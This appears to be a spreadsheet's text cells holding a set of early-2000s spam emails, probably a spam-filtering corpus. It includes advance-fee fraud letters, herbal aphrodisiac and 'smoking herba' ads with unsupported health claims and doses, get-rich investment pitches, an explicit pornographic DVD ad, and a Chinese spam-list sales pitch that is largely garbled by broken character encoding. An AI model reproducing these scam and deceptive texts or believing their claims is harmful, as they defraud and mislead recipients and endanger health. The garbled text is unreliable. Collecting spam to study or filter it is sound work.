********************************************Erotica, Intimacy "Sensitivity" Enhancement at its finest for men &amp; women.Even we did not imagine the "sweet" customer appreciation that Sweet Vjestika has enjoyed. Now, more potent than ever due to higher concentrations of Sweet Vjestika's botanical factors, this is intimacy enhancement at its finest.Sweet Vjestika is an erotic aphrodisia, sexual intensifier/enhancer, liquid amalgamated extract for men &amp; women.  Indeed, a HeavenSent Treasure of Pleasure to entice your Passion, to intrigue your Desire, Enchantment's Rapture, Sweet Vjestika's Fire.The Tantra Sacrament of Sweet Vjestika Aphrodisia Drops Extravagantly Inspires and Enhances:  *Sensitivity to touch 
*Desire to touch &amp; be touched
*Fantasy / Lust / Rapture / Uninhibitedness 
*Erogenous sensitivity
*Sexual courageousness 
*Sexual gentleness and ferocity
SWEET  VJESTIKA  APHRODISIA  DROPS*Prolongs and intensifies foreplay 
*Prolongs and intensifies  orgasm / climax 
*Inspires body, mind, spirit orgasm / climax 
*Inspires and enhances body, mind, spirit communion betwixt lovers 
*Inspires and enhances the enchantment / glamourie of Love
Contents: Whole MaHuang, Bee Pollen, Epimedium Angelica, Rehmannia, Ginger, Schizandra, Polygonatum, Adenophora, Tremella, Tang Kuei, Reishi, Codonopsis, Eucommium, Lycii Berry, Ligusticum, Peony Root, Fo Ti, Atractylodes, Ophiopogon, Royal Jelly, Euryales Seeds, Poria, Licorice, Mountain Peony Bark, Cormi Fruit, Rose Hips, Prince Ginseng, Scrophularia, Alisma, Astragalus, Fennel, Buplerium, Cypera, Aconite, Polygala, Red Sage Root, Jujube Seed, Lotus Seed, Tien Chi Ginseng, Ligus Ticum, Psoralea, Dodder Seed, and Cisthanches in a solution containing 24% pure grain alcohol as a preservative, distilled water and Lecithen as an emulsifier. Suggested Usage: Sweet Vjestika is extremely potent.  Use 10 - 15 drops sublingually or in juice or tea, not to exceed 25 drops.  Best when taken upon an empty stomach approx. 45 minutes before intimacy.  Based upon 25 - drop increments there are approx. 60 dosages per 1 oz. bottle.  Usage should not exceed 2 doses per week.  Persons taking any prescription medication or suffering from depression or anxiety, should consult with their health care provider before using.  This product is not intended for usage by persons with abnormal blood pressure or any cardiovascular malady or any thyroid dysfunction.  Nor is it to be used during pregnancy or by any person under 21 years of age.********************************************************
SWEET VJESTIKA PRICING:* One 1 oz. bottle (approx. 60 dosages) ... $90.00 plus shipping
* Two 1 oz. bottles (approx. 120 dosages) ... $140.00 plus shipping(See Intro Offers at bottom of this text for further savings!)***************************
**GENTLE FEROCITY (tm)**
***************************Heaven-Sent "Viripotent" Energization, Appetite Suppression Tablets without the inclusion of  Caffeine or MaHaung Herb or Ephedrine! 
* NO jitters.  
* NO inability to sleep at bedtime.
* NO strung-out feeling!A non-caffeine, non-ephedrine, non-ephedra, non-MaHuang; virpotent, herbaceous prescription for the dynamic energization of body, mind and spirit.This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proliferate molecular communion and thereby to achieve demonstrative herbal efficaciousness without negative implication to any aspect of human composition. These Gentle Ferocity Cordial Tablets are incredulously and thoroughly effective. Enjoy!Entirely Natural!  Increases Energy!  Increases Metabolism!  Decreases Appetite!Contents: Each Gentle Ferocity Tablet contains 500 mg. of the following proprietary formulated, high-ratio concentrated botanical factors: Cortex Eucommiae, Radex Polygoni Multiflori, Zizyphus Seed, Fructus Schisandrae, Radix Panax Ginseng, Radix Astragali, Atractylode, Sclerotium, Porial Cocos, Saussurea Tang Kuei, Longan, Radix Paeoniae, Biota Seeds, Glehnia, Radix Salviae, Ligusticum, Lycu Berry, Radix Dioscoreae, Cortex Mouton, Frutcus Corni, Radix Polygalae, Cistanches, Radix Pseudoslellariae and Cortex Aranthopanacis. Suggested Usage: 1 - 2 tablets as needed. Best taken on an empty stomach. Not to exceed 6 tablets per day.  Please Note: Persons with high blood pressure or any cardio-vascular malady should consult with their health care provider before engaging Gentle Ferocity.  Also: Gentle Ferocity is not intended for use during pregnancy nor is it intended for acquisition by any person who has not attained at least 18 years of age.********************************************************
GENTLE FEROCITY TABLETS PRICING:* One 300 count jar ... $130.00 plus shipping
* Two 300 count jars .. for $220.00 plus shipping (reg. $260, save $40)
* Three 300 count jars .. for $290.00 plus shipping (reg. $390, save $100)(See Intro Offers at bottom of this text for further savings!)***************************
**CAPILLARIS HERBA (tm)**
***************************A Sedate Smoking or Brewing Happiness Botanical.Capillaris Loose-leaf Herba is a very calming, happy sort of smoking/brewing herba. Capillaris Herba is a singular botanical and is best utilized close to bedtime as it is a very sedate herba. Not as potent as Shangrila Zowie Wowie from a smoking perspective (no legal product is), but well worth your attention! Many folks find that if they partake of both smoke and brew that not only do they go to sleep very happily, but that their dreaming life is often nicely enhanced.Capillaris Herba botanical is best rolled or bowled when engaged as a "Smoka." As is an herbalist's way, four or five draws of "Smoka" should be inhaled and retained. For the non-smoker, it is most appropriate to engage Capillaris Herba as a most peaceful brew/tea. (Steep approximately one teaspoon of Capillaris Herba per one cup of water for ten minutes or so &amp; strain.) Capillaris Herba is not intended for use during work or while driving. Nor should it be enjoyed during pregnancy. In addition, although no factor in Capillaris Herba is illegal or regulated, it is the ethical policy of Exotic Botanical Resources that Capillaris Herba not be sold or offered to any person that has not attained at least 21 years of age.  All things in their time.********************************************************
CAPILLARIS HERBA PRICING:* One 2 oz. bag ... $65.00 plus shipping
* Two 2 oz. bags ... $100.00 plus shipping(See Intro Offers at bottom of this text for further savings!)********************************************************"CUSTOMER APPRECIATION" INTRODUCTORY OFFERS All intro offers include a FREE 2 oz. package of our Capillaris Herba (regularly $65.00).PLEASE NOTE:All Exotic Botanical Resource Product are intended for sophisticated adult usage. No Exotic Botanical Resource product is intended for use during pregnancy and although no factor or product is regulated or illegal, it is the mandatory ethical policy of Exotic Botanical Resources that no XBR product be sold or offered to any person that has not attained at least 21 years of age.  All things in their time.A) NORTH INTRO OFFER -- Includes the following:
* One 1/4 lb. can of Shangrila Zowie Wowie
(incl. hookah &amp; herb pipe) 
* One 300 count container of Prozaka tablets
PRICE:  $180.00 (Reg. price $280 - you SAVE $100)B) SOUTH INTRO OFFER -- Includes the following:
* One 1/4 lb. can of Shangrila Zowie Wowie 
(incl. hookah &amp; herb pipe) 
* One 300 count jar Gentle Ferocity tablets
PRICE:  $190.00 (Reg. price $280. You save $90)C) EAST INTRO OFFER -- Includes the following:
* One 1/4 lb. can of Shangrila Zowie Wowie
(incl. hookah &amp; herb pipe) 
* One 1 oz. bottle of Sweet Vjestika Aphrodisia Drops 
PRICE:  $170.00 (Reg. price $240. You save $70)D) WEST INTRO OFFER -- Includes the following:
* One 1/4 lb. can of Shangrila Zowie Wowie 
(incl. hookah &amp; herb pipe)
* One 2 oz. bottle of Aqueous Kathmandu 
PRICE:  $170.00 (Reg. price $265. You save $95)E) WET INTRO OFFER -- Includes the following:
* One 2 oz. bottle of Aqueous Kathmandu
* One 1 oz. bottle of  Sweet Vjestika Aphrodisia Drops
PRICE:  $145.00 (Reg. price $205. You save $60)F) APHRODISIA INTRO OFFER -- Includes the following:
* One 1/4 lb. can of Shangrila Zowie Wowie 
(incl. hookah &amp; herb pipe)
* One 1 oz. bottle of  Sweet Vjestika Aphrodisia Drops
PRICE:  $150.00 (Reg. price $240. You save $90)G) MINI INTRO OFFER -- Includes the following:
* One 1 oz. bag of Shangrila Zowie Wowie 
(incl. herb pipe only)
* One 100 count container of Prozaka tablets
PRICE:  $110.00 (Reg. price  $135. You save $25)H) VISIONARY INTRO OFFER -- Includes the following:
* One 1/4 lb. can of Shangrila Zowie Wowie
(incl. hookah &amp; herb pipe)
* One 300 count container of Prozaka tablets
* One 300 count Gentle Ferocity tablets
* One 1 oz. bottle of  Sweet Vjestika Aphrodisia Drops
* One 2 oz. bottle of Aqueous Kathmandu 
PRICE:  $310.00 (Reg. price $615. You save $305)**********************************************************************To order via credit card or for customer 
assistance &amp; product information, please call: 1-623-972-5999 Hours: Mon. - Sat. 10 a.m. to 9 p.m. Central TimeAll orders are shipped next day via US Postal domestic and international Priority Mail.Beyond business hours, please enjoy automated convenience.  Leave your name and phone number and a convenient time to return your call.  Certainly, we will be happy to do so.***********************************************************************
To remove your address from our list, click on the following link and send a blank email.  mailto:bm7@btamail.net.cn?subject=Remove</t>
  </si>
  <si>
    <t xml:space="preserve">socialOn January 1st 2002, the European countries beganusing the new Euro.  Never before have somany countries with such powerful economies unitedto use a single currency.  Get your piece of historynow!  We would like to send you a FREE Euroand a FREE report on world currency.  Just visitour site to request your Euro and Euro report:http://www.justaclick-supersite.com/euro/In addition to our currency report, you can receiveour FREE INVESTMENT PACKAGE:*  Learn how $10,000 in options will leverage $1,000,000 inEuro Currency. This means even a small movement in the markethas huge profit potential. csiceIf you are over age 18 and have some risk capital, it'simportant that you find out how the Euro willchange the economic world and how you can profit!http://www.justaclick-supersite.com/euro/Please carefully evaluate your financial position beforetrading.  Only risk capital should be used.8C43FD25CB6F949944EE12C379E50028UTBXCUHEPUFFBNKWQFull opt-out instructions on the bottom of the site-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
Get 12 FREE VHS or DVDs!  
 Click  HERE For Details!  
We Only Have HIGH QUALITY Porno Movies to Choose From!
 "This is a VERY SPECIAL, LIMITED TIME OFFER." Get up to 12 DVDs absolutely FREE, with NO COMMITMENT!There's no better deal anywhere.
There's no catches and no gimmicks. You only pay for the shipping, and the DVDs are absolutely free!Take a Peak at our  Full Catalog!
 High quality cum filled titles such as:
 500 Oral Cumshots 5Description: 500 Oral Cum Shots! I need hot jiz on my face! Will you cum in my mouth?   
 Dozens of Dirty Hardcore titles such as:
 Amazing Penetrations No. 17Description: 4 full hours of amazing penetrations with some of the most beautiful women in porn!   
 From our "Sexiest Innocent Blondes" collections:
 Audition TapesDescription: Our girls go from cute, young and innocent, to screaming sex goddess
 beggin' to have massive cocks in their tight, wet pussies and asses!  
</t>
  </si>
  <si>
    <t xml:space="preserve">
Secured Investements
  WEALTH WITHOUT RISK!!!
Discover The Best Kept Secret In America!Turning $300 Into $20,000In Oklahoma, Craig
Talkington purchased a Tax Lien on a 5 acre parcel for
$300. The owner failed to pay the taxes and forfeited
the 5-acre parcel to Craig Talkington. A short time
later Craig sold that property to one of the neighbors
for $20,000. That's the kind of money that buys new
cars and sends young people to college. Craig didn't
stop at one deal. He later bought a tax lien for only
$17 on a ten acre track, the property owner failed to
pay the taxes, and Craig ended up the property, which
he sold for $4,000. I don't know how much money you
are making right now but these are the kinds of
profits that change peoples lives and solve financial
problems and make things a lot better.
Janice Knetzger Turned A $463.00 Investment Into $65,000.00!
Wayne Robertson Paid $1.00 For A Home!
 Todd Beemer Turned A $21,500 Investment Into $150,000.00!
For Serious Investors and Entrepreneurs Only
For a 
FREE
Consultantion to see if you qualify
Fill out
the no obligation form below for more
information.
Required Input Field*NAME
*
ADDRESS
*
CITY
*
STATE
*
PHONE
*
EMAIL ADDRESS
**All
tax liens and deeds directly support local
      fire departments, police departments, schools,
roads, and hospitals.  Thank you for your interest and
support.
      To be removed, please  
      click here.4589dfSl1-151rzeh9359iYoc9-006Fl29
</t>
  </si>
  <si>
    <t xml:space="preserve">ATTN:SIR/MADAN                                                                   STRICTLY CONFIDENTIAL.I am pleased to introduce myself  to you.My name is Mr. Manuel Oko a native of South Africa and a senior employee of mines and natural resources department currently on a trainning course in Holland for few months.I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amouth.Since this money can be paid directly into any bank account of your choice,you have responsibility to ensure that my partner and Ireceive(70%)of the total amouth.While the balance (5%) will be set aside for any unforseen expenses in the cause of transfering this money.I will appreciate if you can give your assurance and guarantee that our share will be well secured.Please for the sake of confidentiality,reach me on my e-mail address:  manueloko1000@netscape.net .  Please let me know if this proposal is acceptable to you. Kindly reach me immediately with any of the stated contact addresses so that better clearifications 
relating to the transaction will be explained to you.
Truly yoursManuel Oko
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
FROM:MR. DESMOND STEVENS                     URGENT ASSISTANCE. 
YOU MAY BE SURPRISED TO RECEIVE THIS LETTER FROM ME SINCE YOU DO NOT KNOW ME PERSONALLY. I AM MR.DESMOND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MILLION,FIVE HUNDRED THOUSAND UNITED STATES DOLLARS (US$10,500,000)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FATHERï¿½S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5% OF THIS MONEY FOR ALL EXPENSES INCURRED IN PROCESSING THIS TRANSACTION. IF YOU DO NOT PREFER A PARTNERSHIP, I AM WILLING TO GIVE YOU 25% OF THE MONEY WHILE THE REMAINING 70% THAT IS MEANT FOR ME, WILL BE FOR THE INVESTMENT IN YOUR COUNTRY. 
PLEASE, CONTACT ME WITH THE ABOVE TELEPHONE AND E-MAIL ADDRESS, WHILE I IMPLORE YOU TO MAINTAIN THE ABSOLUTE SECRECY REQUIRED IN THE TRANSACTION. 
YOURS FAITHFULLY, 
DESMOND STEVENS. -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">ToyABC's Good Morning America ranks it the #1 Christmas Toy of the season! 
"The new 3-inch mini remote control cars are out of stock everywhere! 
    Parents are searching frantically but having no luck. There are millions of 
    kids expecting these for the Holiday season, lets hope somebody gets them 
    in or Santa may be in trouble!" Dianne Sawyer, Nov 2002
Sold Out in all stores accross the country. Retail price is $59.99. We have 
    limited stock and Free shipping for only $29.95!
Check out this Years Hottest Toy!
Â 
unsubscribe 
    forever </t>
  </si>
  <si>
    <t xml:space="preserve">Untitled DocumentÂ 
Â Let 
        Mortgage Lenders compete for your Business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</si>
  <si>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The 
            Famous
            eBay Marketing e-Course...Â Â                   Learn To
 Sell With the Complete eBayÂ™                   
Auction Marketing e-Course 
Here's 
                  YOUR Chance To Join The Online
                  Selling Revolution And EARN A FULL TIME  INCOME! Our eBay                    Marketing e-Course will show you how to create 
HUGE profits selling on eBay!Â Do you sell on eBay? If so, you could be making up
to $100,000 per month.                  This is no hype and no scam. Receiving over 1.5 billion page views per
month, eBay is the ULTIMATE venue for selling virtually anything and making
huge profits with almost no effort. But you have to know what to sell and
how to sell. That's where I come in.                  As a leading expert in internet marketing and the owner of several profitable
auction-based businesses, the manual that I have written provides easy to
understand and detailed instructions for maximizing your profits with selling
strategies that are PROVEN WINNERS.                  If you've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don't need any specialized computer knowledge,
but you should be familiar with buying and selling on eBay auctions. I'm
not going to waste your time teaching you how to register - I'm going to
pass on the SECRET SELLING TECHNIQUES that I use each and every day to bring
in hundreds of thousands of dollars selling my products on internet auctions.
The manual comes as a complete course with the following lessons:Make a Fortune on eBayÂ™Â 
 Make a Fortune on                    eBayÂ™ is filled with page after page 
of vital eBayÂ™ marketing                    information. This valuable e-Book 
is terrific for the eBayÂ™                    user to get the right eBayÂ™ information
and have an instant                    edge over other more experienced eBayÂ™
Sellers
Advanced Selling on eBayÂ™Â  
 Advanced Selling                    on eBayÂ™ has more vital information
to make their auction a                    success. This e-Book has many topics 
to ensure that they get                    the maximum potential from their 
auctions.Â Advanced                    Selling on eBayÂ™ goes into more detailed 
information than it's                    sister e-Book Make a Fortune on eBayÂ™.
16 eBayÂ™ FormsÂ 
"16 eBayÂ™ Forms" is a must.                    These 
forms will help them track, analyze and record their                    auctions. 
It contains 16 forms with full instructions. This                    E-Book 
also contains the forms in printer friendly version, so                  
 they can print them for immediate use.                    
Wholesale Sources
Wholesale Sources is the final                    e-Book 
in the eBayÂ™ Marketing e-Course. It contains wholesale                    distributors
from the United States, Mexico, Hong Kong,                    Taiwan, Asia
and the Philippines.Â  Armed with this e-Book                    your customers
will have over 10,000,000 wholesale products at                    their
finger tips..
This manual is designed for individuals looking to form
an online business for extra income or as a full-time job making hundreds
of thousands of dollars on eBay. Contained in the manual are WINNING STRATEGIES
for selling on eBay auctions. The manual is not designed for eBay novices
and does not teach the "basics" such as registering, putting an item online,
buying an item, etc. This manual is designed to make eBay users into successful
and wealthy entrepreneurs!
Not only will you be able to make THOUSANDS with the
information in these e-Books, you will also receive                    FULL
Resellers rights. This is not an affiliate program where                
   you get 20 or 30%... you keep all the money generated from your      
                  e-Course sales.
You can sell this e-Course as many times as you want for
                   whatever price you choose. There is NO LIMIT on how much
you can make from this incredible product!
Sell these e-Books individually or 
as a                          complete e-Course. Give "Make a Fortune on eBay" 
for free                          and use "Advanced Selling on eBay", "16 
eBay Forms" and                          "Wholesale Sources" as a sell up.Â  
All 4 e-Books 
for only $19.99.Â   Click Here To Order Your e-Course                    Today!Â Please allow up to 24 hours to 
process your order (1-2 hours during business hours).Thank you for your time and I hope to hear from you soon!
Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!--
P{
  font-size : 12px;
  color : navy;
}
--&gt;(Hello,This is Chinese Traditional)
ï¿½ï¿½å­ï¿½]ä»¶ â€•â€•21ä¸–ï¿½oæœ€æœ‰æ•ˆçš„å®£ï¿½éž£ç»žå‰‘ï¿½
Â  Â æ‚¨æƒ³ï¿½ï¿½ï¿½ï¿½åœ°10ï¿½fäººåŒä¸€ï¿½råˆ»çŸ¥é“æ‚¨çš„ï¿½Vå‘Šï¿½å¹”ç£•ï¿½æƒ³æ–¹ä¾¿å¿«æ·çš„å®£ï¿½é«‚ï¿½çš„ä¼ï¿½Iï¿½å¹”ï¿½Â  Â æ‚¨æƒ³åœ¨å•†ï¿½Iï¿½ï¿½ï¿½ï¿½ä¸­æ­¥æ­¥ï¿½ï¿½ï¿½ç´«ï¿½ï¿½Cï¿½å¹”ï¿½
æ‚¨æƒ³ä¸€æ¬¡ï¿½ç¢›ï¿½ï¿½ï¿½ï¿½|ï¿½ï¿½ï¿½ï¿½åœ¨å•†ï¿½Iå®¢ï¿½ï¿½ï¿½å¹”ï¿½
Â  Â è¶Šï¿½ç¢“è•‰å—Ÿæ¼{æŸ¥è¡¨æ˜Ž ï¼Œï¿½Wè·¯ç›´ï¿½Nï¿½ï¿½ï¿½ï¿½æˆï¿½ï¿½æœªï¿½ï¿½ï¿½Iï¿½Næ–¹å¼çš„ä¸»æµï¼Œè€ŒE-mailï¿½â‘¹è”·Wä¸Šï¿½Iï¿½Næœ€å¸¸ç”¨ä¹Ÿæ˜¯æœ€ï¿½ï¿½ç”¨çš„å·¥å…·ã€‚
å…¶ç‰¹ï¿½cï¼šï¿½ï¿½ï¿½ï¿½ï¿½Vï¼Œï¿½ræ•ˆé«˜ï¼Œï¿½ræ ¼ä½Žã€‚ï¿½ï¿½eMarketerä¼°ï¿½ï¿½ï¼Œç¾Žï¿½ï¿½æœ‰61%çš„ä¸­ç­‰ï¿½ï¿½æ¨¡å…¬å¸ï¿½ï¿½å¸¸ï¿½\ç”¨ï¿½ï¿½å­ï¿½]ä»¶ï¿½Mè¡Œï¿½Iï¿½Næ´»ï¿½å°ï¿½éƒ¨åˆ†ï¿½Vå‘Šåª’ï¿½wå¹³å‡å›žï¿½ï¿½çŽ‡æ¯”ï¿½^ ï¼ˆAverage Response
Rate Rangesï¼‰ 
ã€€ 0.5-1% æ™®é€šæ¨ªå¹…å¹¿å‘Š(banner ads) ã€€ 1-2% æ™®é€šä¿¡ä»¶(direct mail) ã€€ 10-15% ï¿½ï¿½å­ï¿½]ä»¶(Email) 
ä¸€ [ï¿½]ä»¶å‡ºå”®] ï¿½ï¿½ï¿½Iå…¨çƒï¿½]ä»¶åœ°å€ï¼š æ¯1000ï¿½f/500HK ï¼ˆï¿½ï¿½ï¿½Iå…¨éƒ¨9000ï¿½f/3600HKï¼‰ï¿½ï¿½ï¿½Ié¦™æ¸¯ï¿½]ä»¶åœ°å€ï¼š æ¯10ï¿½f/400HK Â  ï¼ˆï¿½ï¿½ï¿½Ié¦™æ¸¯å…¨éƒ¨325ï¿½f/5500HKï¼‰
Â free download
ï¿½ï¿½ï¿½Iï¿½_ï¿½èµ¤]ä»¶åœ°å€ï¼š æ¯10ï¿½f/400HK Â  ï¼ˆï¿½ï¿½ï¿½Iï¿½_ï¿½æ©™ï¿½éƒ¨201ï¿½f/4500HKï¼‰
Â free download Â  Â [ï¿½]ä»¶ï¿½lé€]
ï¿½Vå‘Šï¿½]ä»¶ä»£ç†ï¿½lé€ï¼š æ¯10ï¿½f/500HK 20ï¿½fèµ·ï¿½l
ï¼ˆï¿½èš€_çŽ‡90%ä»¥ä¸Šï¼‰
åŒ…å‘¨ç¾¤ï¿½lï¼š Â  Â  Â  Â  ä¸€å‘¨60ï¿½f/2500HKÂ  Â  Â  Â  Â  Â 
Â  Â  Â  Â ä¸€å‘¨100ï¿½f/4000HK
ï¼ˆä¿ï¿½Cï¿½Wç«™æ—¥ï¿½Lï¿½ï¿½é‡æå‡2000ä»¥ä¸Šï¼‰
åŒ…æœˆç¾¤ï¿½lï¼š Â  Â  Â  Â  ä¸€æœˆ500ï¿½f/9500HK
ï¼ˆä¿ï¿½Cï¿½Wç«™æ—¥ï¿½Lï¿½ï¿½é‡æå‡5000ä»¥ä¸Šï¼‰  Â  Â [ï¿½]ä»¶ï¿½ï¿½ï¿½w]
70ï¿½Nå¥—ç¾¤ï¿½lï¼Œæœç´¢ï¼Œï¿½Wè·¯ï¿½lï¿½è¡ï¿½ï¿½w/2200HK ï¿½ï¿½ä½ è‡ªå·±ï¿½ç¢›å¹¸æƒ¶æ·„æ™Ÿé¢‘ç¢¾ï¿½å­ï¿½]ä»¶ç¾¤ï¿½lï¼Œæœç´¢ï¼Œï¿½Wè·¯ï¿½lï¿½ä¸¥åˆ°y
æœ‰æ„è€…è¯·æ¥ä¿¡è”ç³»ï¼šyhzx599@vip.sina.comäºŒ æœç´¢å¼•æ“Žï¿½]ï¿½ç¼˜é¡·ï¿½ ï¼ˆè¶…å€¼æœï¿½çœ¨ï¿½ç‰¹æƒ ï¿½r2200
HKï¼‰
ï¿½yæ²³ä¹‹æ˜Ÿï¿½æ¹ï¿½ç™»ï¿½ï¿½å…¨çƒ6000ï¿½ï¿½è‹±æ–‡æœç´¢å¼•æ“Žï¼Œï¿½M200ï¿½ï¿½ä¸­æ–‡æœç´¢å¼•æ“Žã€‚ï¿½ï¿½ä½ çš„ï¿½Wç«™äº«ï¿½uå…¨çƒã€‚
e-mailåœ°å€åœ¨å„åœ°ï¿½^çš„åˆ†ï¿½ï¿½ï¿½ç›—ï¿½é¦™æ¸¯â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•32525642ï¿½ï¿½
Â free download the sample
ï¿½_ï¿½åœºï¿½â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•20012356ï¿½ï¿½
Â free download the sample
å…¨çƒâ€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•â€•9000ï¿½fÂ  ï¿½yæ²³ä¹‹æ˜Ÿï¿½ç¢›ï¿½ï¿½ï¿½ï¿½éŸ§é¦ï¿½ï¿½|ï¿½ï¿½æœ‰æ•ˆçš„emailä½å€ï¿½Yæ–™ï¿½æ¬¤ï¿½å¯ä»¥æ ¹ï¿½ï¿½å®¢ï¿½èˆ»ç”·æž°ï¿½ï¼Œåœ¨æŒ‡å®šçš„åœ°æ–¹ï¼Œï¿½^åŸŸ,è¡Œï¿½Iï¿½ï¿½ï¿½eç­‰ï¿½å‚©é…æ–—çƒ¹ï¿½å­ï¿½]ä»¶ï¿½Vå‘Šã€‚
å¦‚ï¼šä½ æƒ³ï¿½ï¿½æŸåœ°10ï¿½fäººä¸€å¤©ä¹‹ï¿½ï¿½éƒ½çŸ¥é“ä½ çš„ï¿½aå“ï¼Œï¿½Yï¿½ï¿½ã€‚é‚£éº½ï¿½Vå‘Šï¿½]ä»¶æŠ•æ”¾å°±æ˜¯ä½ æœ€å¥½çš„è§£ï¿½Qæ–¹æ¡ˆï¼Œå®ƒçš„ï¿½ræ ¼æ˜¯æ‰€æœ‰ï¿½é«…ï¿½ï¿½ræ ¼ä¸­æœ€ä½Žï¼Œ
ä½†åˆæ˜¯æœ€æœ‰æ•ˆçš„ã€‚ï¿½Cé‡æ¯ï¿½ræ¯åˆ»éƒ½ç­‰å¾…è‘—ä½ ï¼Œä¹Ÿï¿½Sä½ æ­£æ˜¯ç”¨äº†ï¿½@ï¿½æ‹¥ï¿½ï¿½é«…èä¾„å±ï¿½è€Œæ‰“åž®äº†æ‰€æœ‰çš„ï¿½ï¿½ï¿½ï¿½ï¿½Îºå¸§ï¼ºså¿«è¡Œï¿½å½±æ¡‘ï¿½ï¿½ï¿½ä½ çš„ä¼ï¿½Iï¼Œ
å…¬å¸ç«‹å³æŽŒæ¡å•†ï¿½Iï¿½é«…é™æ‹¿ï¿½ï¿½}------ï¿½Vå‘Še-mailã€‚ï¿½@æ˜¯æ™®é€šï¿½éº‚Nï¿½ï¿½ï¿½Iæ‰€ä¸èƒ½æ¯”ï¿½Mçš„ã€‚
ï¿½ï¿½ï¿½MåŠä»˜æ¬¾æ–¹å¼ï¼š
æœ¬å…¬å¸ï¿½æ°–æˆ®Wè·¯ï¿½Vå‘Šå¤šå¹´ï¼Œå®£ï¿½é«Î§ä»»ç—ªåˆï¿½ï¿½ï¿½ç¬¬å››å¤§ï¿½Wè·¯ï¿½Vå‘Šå•†ä¹‹ä¸€ï¼Œ
æˆ‘ï¿½ï¿½æœ‰ï¿½ï½‰Tçš„æŠ€ï¿½gäººï¿½Tå’Œé«˜é€Ÿï¿½ï¿½ï¿½Içš„æœï¿½éšœåˆ°yï¿½æ°–éº“éš§ï¿½å·¥ä½œï¼Œå¿…ï¿½ï¿½ï¿½ï¿½æ‚¨çš„ä¼ï¿½Iæä¾›æœ€è¿…æ·ã€æœ€æœ‰æ•ˆã€æœ€ï¿½Mæ„çš„æœï¿½é“¡ï¿½
éœ€æ±‚å®¢ï¿½ç²½ï¿½ï¿½cï¿½æš¨@ï¿½Yï¼ˆï¿½ï¿½ï¿½Mï¿½]ç®±)
yhzx599@vip.sina.com ï¼ˆï¿½ç¡‡è€ªï¿½æ³¨æ˜Žæ‚¨éœ€è¦çš„æœï¿½å¼ cï¿½ï¿½ï¿½Mæ–¹å¼ï¼Œæˆ‘ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½å¿«å›žï¿½æ¹ï¿½ã€‚ï¼‰æ¸¯ã€æ¾³ã€ï¿½_åœ°ï¿½^ä»˜æ¬¾æ–¹å¼ï¼ˆä»»ä½•ï¿½ï¿½å®¶å‡å¯åˆ°ï¿½ï¿½åœ°ï¿½yè¡Œï¿½ï¿½ï¿½Rï¼Œ2-3å¤©åˆ°ï¿½ãƒï¿½
éœ€åˆ°ï¿½ï¿½åœ°ï¿½yè¡Œï¿½kç†ï¿½ï¿½ï¿½R 
English:BENIFICIARY CUSTOMER: Â wangjingjing
A/C BANK: Â  Â  Â  Â  Â 
Â  Â BANK OF CHINA MIANYANG BRANCH
A/C NO: Â  Â  Â  Â  Â 
Â  Â  Â 8209 9802 0003 158
BENIFICIARY'S TEL NO : 0816-6623109ä¸­æ–‡ï¿½Ï†çœ¨ï¿½
æ”¶ æ¬¾ äººï¼š çŽ‹æ™¶æ™¶
æ”¶æ¬¾ï¿½yè¡Œï¼š ä¸­ï¿½ï¿½ï¿½yè¡Œï¿½dï¿½ï¿½åˆ†è¡Œ
ï¿½ï¿½ Â  Â ï¿½ï¿½ï¼š 8209 9802 0003 158
æ”¶æ¬¾äººï¿½ï¿½ï¿½ï¿½ï¼š0816-66231092-3å¤©åˆ°ï¿½ãƒï¿½æ¬¾åˆ°å¾Œæˆ‘ï¿½ï¿½ï¿½â’˜â’“ï¿½ï¿½ï¿½æ‚¨æä¾›æœ€ï¿½Mæ„æœï¿½é“¡ï¿½ï¿½gè¿Žï¿½ç¡‡ï¿½ï¿½é»¼ï¿½ï¿½Jï¿½ï¿½ï¿½ï¿½ï¿½M ï¿½ï¿½ï¿½ï¿½ï¼š0086-0816-6623109
ï¿½yæ²³ä¹‹æ˜Ÿï¿½Wè·¯ï¿½Yï¿½ï¿½æœ‰é™å…¬å¸
å…¬å¸åœ°å€ï¼šä¸­ï¿½ï¿½å¤§ï¿½ï¿½ï¿½dï¿½ï¿½
EMAILï¼šyhzx599@vip.sina.com 
ï¿½Jï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¼š0086-0816-6623109 -----------------------------------------------------------------------------------------------------------------------------------
å…¬å¸æœï¿½ï¿½ï¿½ï¼ç¦å£•Wè·¯æŽ¨ï¿½V ï¿½Wç«™å»ºï¿½O ï¿½Wè·¯ï¿½ï¿½å
ï¿½Wï¿½ï¿½å¯„å­˜ åŠŸèƒ½ï¿½ï¿½ï¿½å¾—ï¿½ï¿½Qç©ºï¿½g ï¿½ï¿½ï¿½wï¿½lå±•ç­‰ï¼Œï¿½rï¿½Xä½Žå»‰ï¼Œæœï¿½ï¿½ï¿½ï¿½ï¿½|ï¿½gè¿Žï¿½ç¡‡ï¿½ï¿½é»¼ï¿½ï¿½ï¿½ï¿½M
-----------------------------------------------------------------------------------------------------------------------------------</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings!You are receiving this letter because you have expressed an interest in 
receiving information about online business opportunities. If this is 
erroneous then please accept my most sincere apology. This is a one-time 
mailing, so no removal is necessary.If you've been burned, betrayed, and back-stabbed by multi-level marketing, 
MLM, then please read this letter. It could be the most important one that 
